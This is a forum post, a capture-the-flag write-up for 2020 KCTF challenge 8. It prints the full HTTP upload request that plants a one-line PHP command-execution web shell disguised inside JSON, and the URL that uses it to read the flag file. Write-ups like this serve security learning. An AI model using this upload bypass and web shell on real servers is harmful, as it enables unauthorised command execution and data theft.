首页
论坛
课程
招聘
[原创]2020KCTF 第八题 牛刀小试 wp
2020-5-1 22:41 3503

[原创]2020KCTF 第八题 牛刀小试 wp

2020-5-1 22:41
3503

贴上传请求报文

POST /index.php HTTP/1.1
Host: 47.102.223.17:2333
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=--------361693857
Content-Length: 183

----------361693857
Content-Disposition: form-data; name="file";filename="1.php"
content-type:text/php

{"asd":"<?php $cmd = $_GET['cmd'];echo `$cmd`;?>"}
----------361693857--

访问链接

http://47.102.223.17:2333/upload/1833916211.php?cmd=cat%20../../../../flag

另外怀疑是不是题目出错了,正则表达式这块出现问题

匹配不到字符

删除首尾/后成功匹配



《0day安全 软件漏洞分析技术(第二版)》第三次再版印刷预售开始!

最后于 2020-5-2 11:33 被会飞的锅编辑 ,原因: 上传图片
收藏
点赞0
打赏
分享
最新回复 (2)
雪    币: 557
活跃值: 活跃值 (1577)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
kanxue 活跃值 8 2020-5-1 23:30
2
0
图片丢失,重新上传下
雪    币: 3621
活跃值: 活跃值 (42)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
会飞的锅 活跃值 2020-5-2 11:34
3
0
kanxue 图片丢失,重新上传下
上传到tmp目录,保存一下就成这样了,折腾了五六次,还没整好
游客
登录 | 注册 方可回帖
返回